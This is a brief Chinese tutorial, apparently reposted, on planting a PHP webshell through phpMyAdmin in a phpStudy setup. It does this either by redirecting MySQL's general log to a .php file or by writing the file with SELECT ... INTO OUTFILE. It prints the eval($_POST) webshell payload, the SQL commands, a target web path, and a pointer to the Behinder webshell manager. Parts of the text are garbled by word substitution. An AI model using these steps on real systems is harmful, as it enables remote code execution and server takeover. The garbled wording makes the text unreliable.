常见cms漏洞之PhPMyadmin

环境phpstudy

安装后直接访问即可暗码为mysql的暗码，在小皮中即可查看


通过日志文件拿Shell

        利用mysql日志文件写shel，这个日志可以在mysql里改变它的存放位置，登录phpmyadmin可以修改这个存放位置，并且可以修改它的后缀名。以是可以修改成php的后缀名就能获取一个webshell。

把值修改为on，以及www下的php文件
然后去select语句

1. select "<?php phpinfo();eval($_POST['cmd']);?>"

复制代码

导入导出拿WebShell

1.首先判断mysql位置

1. select @@datadir

复制代码

2.猜测web路径猜测web路径扩展的同级目录下存在www目录

1. C:\phpstudy_pro\WWW\222.php

复制代码

3.写入webshell

1. select  "<?php phpinfo();@eval($_POST[cmd]);" into outfile "C:/phpstudy_pro/WWW/222.php"

复制代码

对webshell利用冰蝎吧！

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。